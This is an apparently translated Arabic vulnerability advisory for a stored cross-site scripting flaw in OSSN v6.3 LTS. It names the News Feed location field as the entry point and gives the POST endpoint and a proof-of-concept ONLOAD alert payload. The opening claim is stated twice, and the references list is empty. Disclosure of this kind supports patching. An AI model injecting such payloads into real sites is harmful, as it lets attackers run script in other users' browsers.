
اكتُشف أن OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS يحتوي على ثغرة تخزينية في البرمجة النصية عبر المواقع (XSS) عبر وحدة موجز الأخبار.
تم اكتشاف أن OpenTeknik LLC OSSN شبكة التواصل الاجتماعي مفتوحة المصدر v6.3 LTS تحتوي على ثغرة برمجة نصية عبر المواقع (XSS) مخزنة عبر وحدة News Feed.
يجب على المهاجم نشر محتوى في "الموجز الإخباري" (news feed) وإدخال حمولة XSS في حقل الموقع لاستغلال ثغرة XSS المخزنة. سيتم تشغيل حمولة XSS فور الإرسال.
http://ip_address:port/ossn/home
POST /ossn/action/wall/post/a?ossn_ts=1656419179&ossn_token=83b0ebdb6b2bbbcbaa0b804ce5cf3b5fba29a25474715bf2f7e4bbbd85316a86
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome الإصدار 102.0.5005.115 (البناء الرسمي) (x86_64)
:shipit: فريق Grim The Ripper بواسطة SOSECURE تايلاند
المراجع: